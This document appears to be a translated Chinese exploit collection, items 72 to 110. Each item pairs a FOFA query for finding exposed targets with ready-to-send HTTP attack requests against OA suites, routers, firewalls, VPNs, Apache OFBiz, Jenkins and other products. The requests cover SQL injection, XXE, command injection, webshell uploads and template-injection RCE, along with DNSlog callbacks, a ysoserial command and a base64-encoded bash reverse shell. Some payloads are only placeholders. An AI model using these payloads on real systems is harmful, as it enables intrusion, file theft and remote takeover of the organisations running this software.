GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus-on-hand service management platform service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. Superdata (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 (Sifudi) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The EXP request is as follows; it plants a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. DBAppSecurity (安恒) MingYu (明御) security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. Seeyon (致远互联) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom and broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision (海康威视) integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision (海康威视) operations management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. QAX (奇安信) NetGod (网神) SecGate3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi-Anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (Yingkeshi) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==


The SAMLRequest value is the base64 encoding of the XML file contents; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>


104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own token
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
